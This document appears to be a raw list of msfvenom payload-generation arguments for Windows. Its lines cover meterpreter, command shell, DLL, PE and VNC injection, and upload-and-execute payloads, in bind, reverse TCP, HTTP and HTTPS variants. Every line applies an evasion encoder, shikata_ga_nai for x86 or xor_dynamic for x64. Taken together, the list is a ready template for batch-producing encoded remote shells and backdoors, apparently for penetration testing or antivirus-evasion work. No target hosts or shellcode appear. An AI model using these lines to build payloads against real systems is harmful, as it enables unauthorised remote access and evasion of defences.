windows/dllinject/bind_hidden_ipknock_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/bind_hidden_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/bind_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/bind_ipv6_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/bind_named_pipe -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/bind_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/bind_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/bind_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/find_tag -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_hop_http -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_http -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_http_proxy_pstore -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_ord_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_tcp_allports -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_tcp_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_tcp_rc4_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/dllinject/reverse_winhttp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/bind_hidden_ipknock_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/bind_hidden_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/bind_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/bind_ipv6_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/bind_named_pipe -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/bind_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/bind_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/bind_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/find_tag -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_hop_http -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_http -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_http_proxy_pstore -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_https -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_https_proxy -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_named_pipe -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_ord_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_tcp_allports -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_tcp_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_tcp_rc4_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_winhttp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter/reverse_winhttps -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter_bind_named_pipe -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter_bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter_reverse_http -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter_reverse_https -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter_reverse_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/meterpreter_reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/metsvc_bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/metsvc_reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/bind_hidden_ipknock_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/bind_hidden_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/bind_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/bind_ipv6_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/bind_named_pipe -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/bind_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/bind_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/bind_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/find_tag -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/reverse_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/reverse_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/reverse_ord_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/reverse_tcp_allports -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/reverse_tcp_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/reverse_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/reverse_tcp_rc4_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupdllinject/reverse_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/bind_hidden_ipknock_tc -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/bind_hidden_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/bind_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/bind_ipv6_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/bind_named_pipe -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/bind_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/bind_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/bind_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/find_tag -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/reverse_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/reverse_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/reverse_ord_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/reverse_tcp_allports -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/reverse_tcp_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/reverse_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/reverse_tcp_rc4_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/patchupmeterpreter/reverse_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/bind_hidden_ipknock_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/bind_hidden_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/bind_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/bind_ipv6_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/bind_named_pipe -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/bind_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/bind_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/bind_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/find_tag -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/reverse_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/reverse_named_pipe -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/reverse_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/reverse_ord_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/reverse_tcp_allports -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/reverse_tcp_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/reverse_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/reverse_tcp_rc4_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/peinject/reverse_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/pingback_bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/pingback_reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/powershell_bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/powershell_reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/bind_hidden_ipknock_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/bind_hidden_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/bind_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/bind_ipv6_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/bind_named_pipe -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/bind_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/bind_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/bind_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/find_tag -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/reverse_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/reverse_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/reverse_ord_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/reverse_tcp_allports -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/reverse_tcp_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/reverse_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/reverse_tcp_rc4_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/reverse_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/shell/reverse_udp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell_bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell_bind_tcp_xpfw -a x86 --platform win -e x86/shikata_ga_nai
windows/shell_hidden_bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/shell_reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/speak_pwned -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/bind_hidden_ipknock_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/bind_hidden_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/bind_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/bind_ipv6_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/bind_named_pipe -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/bind_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/bind_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/bind_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/find_tag -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/reverse_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/reverse_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/reverse_ord_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/reverse_tcp_allports -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/reverse_tcp_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/reverse_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/reverse_tcp_rc4_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/reverse_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/upexec/reverse_udp -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/bind_hidden_ipknock_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/bind_hidden_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/bind_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/bind_ipv6_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/bind_named_pipe -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/bind_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/bind_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/bind_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/bind_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/find_tag -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_hop_http -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_http -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_http_proxy_pstore -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_ipv6_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_nonx_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_ord_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_tcp -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_tcp_allports -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_tcp_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_tcp_rc4 -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_tcp_rc4_dns -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_tcp_uuid -a x86 --platform win -e x86/shikata_ga_nai
windows/vncinject/reverse_winhttp -a x86 --platform win -e x86/shikata_ga_nai
windows/x64/meterpreter/bind_ipv6_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/bind_ipv6_tcp_uuid -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/bind_named_pipe -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/bind_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/bind_tcp_rc4 -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/bind_tcp_uuid -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/reverse_http -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/reverse_https -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/reverse_named_pipe -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/reverse_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/reverse_tcp_rc4 -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/reverse_tcp_uuid -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/reverse_winhttp -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter/reverse_winhttps -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter_bind_named_pipe -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter_bind_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter_reverse_http -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter_reverse_https -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter_reverse_ipv6_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/meterpreter_reverse_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/peinject/bind_ipv6_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/peinject/bind_ipv6_tcp_uuid -a x64 --platform win -e x64/xor_dynamic
windows/x64/peinject/bind_named_pipe -a x64 --platform win -e x64/xor_dynamic
windows/x64/peinject/bind_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/peinject/bind_tcp_rc4 -a x64 --platform win -e x64/xor_dynamic
windows/x64/peinject/bind_tcp_uuid -a x64 --platform win -e x64/xor_dynamic
windows/x64/peinject/reverse_named_pipe -a x64 --platform win -e x64/xor_dynamic
windows/x64/peinject/reverse_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/peinject/reverse_tcp_rc4 -a x64 --platform win -e x64/xor_dynamic
windows/x64/peinject/reverse_tcp_uuid -a x64 --platform win -e x64/xor_dynamic
windows/x64/pingback_reverse_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/powershell_bind_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/powershell_reverse_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/shell/bind_ipv6_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/shell/bind_ipv6_tcp_uuid -a x64 --platform win -e x64/xor_dynamic
windows/x64/shell/bind_named_pipe -a x64 --platform win -e x64/xor_dynamic
windows/x64/shell/bind_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/shell/bind_tcp_rc4 -a x64 --platform win -e x64/xor_dynamic
windows/x64/shell/bind_tcp_uuid -a x64 --platform win -e x64/xor_dynamic
windows/x64/shell/reverse_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/shell/reverse_tcp_rc4 -a x64 --platform win -e x64/xor_dynamic
windows/x64/shell/reverse_tcp_uuid -a x64 --platform win -e x64/xor_dynamic
windows/x64/shell_bind_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/shell_reverse_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/bind_ipv6_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/bind_ipv6_tcp_uuid -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/bind_named_pipe -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/bind_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/bind_tcp_rc4 -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/bind_tcp_uuid -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/reverse_http -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/reverse_https -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/reverse_tcp -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/reverse_tcp_rc4 -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/reverse_tcp_uuid -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/reverse_winhttp -a x64 --platform win -e x64/xor_dynamic
windows/x64/vncinject/reverse_winhttps -a x64 --platform win -e x64/xor_dynamic